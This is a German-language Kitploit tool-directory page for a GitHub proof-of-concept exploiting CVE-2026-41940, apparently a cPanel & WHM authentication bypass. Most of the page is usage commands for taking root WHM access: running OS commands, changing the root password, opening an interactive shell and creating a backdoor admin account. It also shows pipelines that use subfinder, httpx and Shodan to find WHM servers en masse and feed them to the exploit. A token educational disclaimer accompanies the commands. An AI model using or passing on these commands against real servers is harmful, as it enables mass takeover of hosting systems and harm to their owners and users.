Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-41940-PoC — Nutzt CVE-2026-41940 aus, eine cPanel-&-WHM-Authentifizierungsumgehung, um Root-WHM-Zugriff zu erlangen und Post-Exploitation-Befehle, Dateilesevorgänge und Kontoverwaltung auszuführen. | Kitploit
Tools/GitHubGitHub/hitechcloud-vietnam/cve-2026-41940-poc
Privilege EscalationAufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and ControlAuthentifizierung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Red Teaming
Remote-Access-Tool
GitHubhitechcloud-vietnam/cve-2026-41940-poc

cve-2026-41940-PoC

Nutzt CVE-2026-41940 aus, eine cPanel-&-WHM-Authentifizierungsumgehung, um Root-WHM-Zugriff zu erlangen und Post-Exploitation-Befehle, Dateilesevorgänge und Kontoverwaltung auszuführen.

Repository anzeigen
4vor 9h 55mNoch nicht geprüft

CVE-2026-41940

⚠ Dieses Tool wurde ausschließlich zu Bildungs- oder Bug-Bounty-Zwecken erstellt. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.

Beschreibung

Ein Tool zum Ausnutzen von CVE-2026-41940, einer kritischen Authentifizierungsumgehung in cPanel & WHM (CVSS 10.0), die es nicht authentifizierten Angreifern ermöglicht, Root-Level-WHM-Zugriff zu erlangen, indem CRLF-Sequenzen über den Authorization-Header in serverseitige Sitzungsdateien eingeschleust werden — ohne dass Anmeldedaten erforderlich sind.

Funktionsweise

CVE-2026-41940 wird allgemein durch einen Fehler in der Art und Weise ausgenutzt, wie das System Authentifizierungssitzungen in cPanel/WHM handhabt. Der Angriff beginnt typischerweise mit einer normalen Anfrage an die Login-Oberfläche, bei der die Anwendung vorzeitig eine Sitzung initialisiert, bevor die Benutzeranmeldedaten vollständig validiert werden. Aufgrund der unsachgemäßen Behandlung sitzungsbezogener Eingaben können bestimmte manipulierte oder unerwartete Eingabestrukturen die Art und Weise verändern, wie Sitzungsdaten vom Server gespeichert oder interpretiert werden.

Betroffene Versionen

VersionAnfälligGepatcht
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Installation (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/hitechcloud-vietnam/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Verwendung

Das Tool erwartet die Angabe einer Ziel-Domain.

Einzelziel-Modus:

root@kitploit:~
python cve.py -u https://target1.com:2083

Sie können auch aus der Datei target.txt scannen (erstellen Sie diese):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Basis-Scan:

Verfügbare Befehle:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # Einzelziel-Scan
python cve.py info -u https://victim1.com:2083 # Ruft Systeminformationen ab (Version, Last, Festplattennutzung).
python cve.py host -u https://victim1.com:2083 # Ruft den Hostnamen des Zielservers ab.

Post-Exploit-Aktionen

root@kitploit:~
# Alle Konten auf dem Server auflisten
python cve.py list -u https://target.com:2087

# OS-Befehl
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Serverinformationen abrufen (Hostname, Festplatte, MySQL-Host)
python cve.py info -u https://target.com:2087

# Root-Passwort ändern
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interaktive WHM-Shell
python cve.py shell -u https://target.com:2087

Pipelines

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# Aus Scope-Liste
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan-Ergebnisse
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Mehrere Quellen kombiniert
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

WHM-Shell-Modus

Nach einer erfolgreichen Ausführung können Sie eine interaktive WHM-Shell öffnen:

root@kitploit:~
python cve.py shell -u

Alle Shell-Befehle


CLI-Referenz

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Einzelne Ziel-URL (z. B. https://host:2087)
  -l, --list LIST        Datei mit URLs (eine pro Zeile)
  --hostname HOSTNAME    Kanonischen Host-Header überschreiben (automatisch erkannt)

Scan:
  -t, --threads N        Parallele Threads (Standard: 10)
  --timeout N            Anfrage-Timeout in Sekunden (Standard: 15)
  --rate-limit N         Verzögerung zwischen Zielen (Standard: 0)
  --force                cPanel-Erkennungsprüfung überspringen

Post-Exploit:
  --action ACTION        Aktion: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          Neues Root-Passwort (--action passwd)
  --cmd CMD              OS-Befehl (--action cmd/exec)
  --new-user USER        Neuer cPanel-Benutzername (--action adduser)
  --new-domain DOMAIN    Neue cPanel-Domain (--action adduser)

Output:
  -o, --output FILE      Ergebnisse in JSON-Datei speichern
  --no-color             ANSI-Farben deaktivieren

Haftungsausschluss

⚠ Dieses Tool wurde ausschließlich zu Bildungs- oder Bug-Bounty-Zwecken erstellt. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.

Tool herunterladen
BefehlBeschreibung
idBenutzer-ID anzeigen
hostnameServer-Hostname abrufen
accountsAlle Benutzerkonten auflisten
infoLast, Festplatte, MySQL-Host, Version
cat <path>Dateiinhalt lesen
exec <cmd>OS-Befehl ausführen
newadmin <user> <pass>Backdoor-WHM-Admin erstellen
passwd <pass>Root-Passwort ändern
l [path]Verzeichnis auflisten
helpAlle Befehle anzeigen
exitShell-Modus beenden